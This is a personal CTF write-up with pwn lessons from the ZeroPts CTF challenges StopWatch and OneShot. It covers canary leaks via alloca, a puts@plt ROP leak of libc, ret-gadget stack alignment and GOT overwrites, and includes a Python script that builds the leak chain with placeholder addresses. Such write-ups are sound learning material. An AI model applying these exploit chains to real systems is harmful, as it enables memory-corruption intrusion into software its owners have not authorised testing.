ZeroPts CTF Pwn

Super awesome, learnt a lot! Still loads to learn, but getting there.

StopWatch:

  • Always google suspicious API calls such as alloca. alloca allocates memory inside the caller's stack frame, so a user-controlled size shifts everything above it on the stack and lets you position a value of interest (here the stack canary) where a later read or print will expose it. (DON'T FORGET YOUR OSCP SKILLS...) The GitHub repo linked below actually covers alloca.
  • When printf prints a float value, the screenshot below (printing 100.000000) shows the value sitting on the stack at rsp+8. Caveat: the x86-64 SysV ABI passes floating-point variadic arguments in xmm0..xmm7 (with al holding the count of vector registers used), so a double that is visible on the stack is there because the compiler stored it there, not because printf reads it from the stack; check the disassembly for where the value is loaded from before relying on that offset.
Sample printf float disassembly
Sample printf float code
  • Play with all user inputs (e.g. invalid characters, size controls). When scanf is fed characters that do not match the format specifier, the conversion fails and the target variable is left untouched, so the stale value at that memory location can still be printed later.
  • Use a pop rdi; ret gadget to load puts@got into rdi and return into puts@plt to leak a libc address, then subtract the symbol's offset to get the libc base.
  • When a segmentation fault occurs, try adding a ret gadget (or other padding) before the actual payload and check whether the stack is aligned: the x86-64 ABI expects rsp to be 16-byte aligned at a call, and glibc functions that use aligned SSE instructions (movaps) crash otherwise. Context: locally it worked, but over remote it failed... Adding a ret gadget to align the stack fixed it!
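As an added example (not code from the original write-up or the challenge), the following Python builds the puts@plt leak chain from the two bullets above and decides, from the address of the saved return address it overwrites, whether a ret gadget is needed to keep the stack aligned. Every address, the buffer-to-RIP distance and the libc puts offset are hypothetical placeholders; in a real exploit they come from the target binary (gadget finder, objdump) and from `readelf -s` on the remote libc.

```python
import struct

# All addresses and offsets below are hypothetical, chosen for illustration;
# they are not taken from the challenge binary or its libc.
POP_RDI_RET = 0x4011e3       # pop rdi ; ret
RET         = 0x40101a       # ret (alignment gadget)
PUTS_PLT    = 0x401030       # puts@plt stub
PUTS_GOT    = 0x404018       # GOT slot holding the resolved libc puts address
MAIN        = 0x401136       # return here for a second stage after the leak
BUF_TO_RIP  = 40             # bytes from the overflowed buffer to the saved RIP
PUTS_LIBC_OFFSET = 0x80a30   # hypothetical offset of puts inside libc


def p64(value):
    return struct.pack("<Q", value)


def build_leak_chain(add_ret):
    """puts(puts@got) followed by a return to main, optionally prefixed by a ret gadget."""
    chain = [RET] if add_ret else []
    chain += [POP_RDI_RET, PUTS_GOT, PUTS_PLT, MAIN]
    return chain


def entry_rsp(rip_slot, chain, target):
    """rsp observed by `target` when the chain returns into it.

    The vulnerable function's ret pops the qword at rip_slot, so chain[i] sits
    at rip_slot + 8*i and, once popped, leaves rsp = rip_slot + 8*(i+1).
    PUTS_GOT occupies its own chain slot, so the pop rdi is accounted for.
    """
    return rip_slot + 8 * (chain.index(target) + 1)


def aligned_at_entry(rsp):
    """SysV x86-64: rsp % 16 == 0 just before a call, hence rsp % 16 == 8 at entry."""
    return rsp % 16 == 8


def make_payload(rip_slot):
    """Return (payload, used_ret_gadget) for a saved-RIP slot at address rip_slot."""
    chain = build_leak_chain(add_ret=False)
    add_ret = not aligned_at_entry(entry_rsp(rip_slot, chain, PUTS_PLT))
    chain = build_leak_chain(add_ret)
    return b"A" * BUF_TO_RIP + b"".join(p64(g) for g in chain), add_ret


def parse_leak(line):
    """Decode what puts printed: a 6-byte little-endian pointer (NUL-terminated) plus newline."""
    raw = line.rstrip(b"\n")
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]


def libc_base(leaked_puts):
    base = leaked_puts - PUTS_LIBC_OFFSET
    assert base & 0xfff == 0, "page-unaligned base: wrong libc or wrong offset?"
    return base


if __name__ == "__main__":
    # A normally called function sees rsp % 16 == 8 at entry, i.e. its saved-RIP
    # slot lives at an address ending in 8: exactly the case that needs the extra ret.
    payload, used_ret = make_payload(0x7ffc12345678)
    print("ret gadget inserted:", used_ret, "payload length:", len(payload))
    # Constructed sample of the line puts would print for a libc puts at 0x7ff734125a30.
    leak = parse_leak(b"\x30\x5a\x12\x34\xf7\x7f\n")
    print(hex(leak), "-> libc base", hex(libc_base(leak)))
```

The alignment check explains the local-versus-remote difference: the chain itself is fine, but whether puts (or later system) lands on an aligned stack depends on where the saved RIP sits, which differs with environment variables and stack layout, so always compute it rather than assume it.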

Screenshot of the flag because I love flags:

OneShot:

  • An exploit has many steps; do not think in terms of a single stage.
  • There are many things you can overwrite! (What you actually overwrite is the writable GOT slot that each PLT stub jumps through; .plt itself is read-only code.) Context: I overwrote puts@plt to restart main but subsequently had no idea what or how to leak addresses. In fact, it is possible to overwrite the other PLT entries as well! In the end, it was necessary to overwrite exit@plt and calloc@plt. Also, printf can be used to leak addresses! Also, you can jump anywhere, e.g. use exit@plt with user-supplied input to skip calloc.
  • Pay attention to your user input! Context: using exit@plt with user-supplied input to skip calloc. I did not know how to skip calloc with exit@plt.

Screenshot of the flag because I love flags:
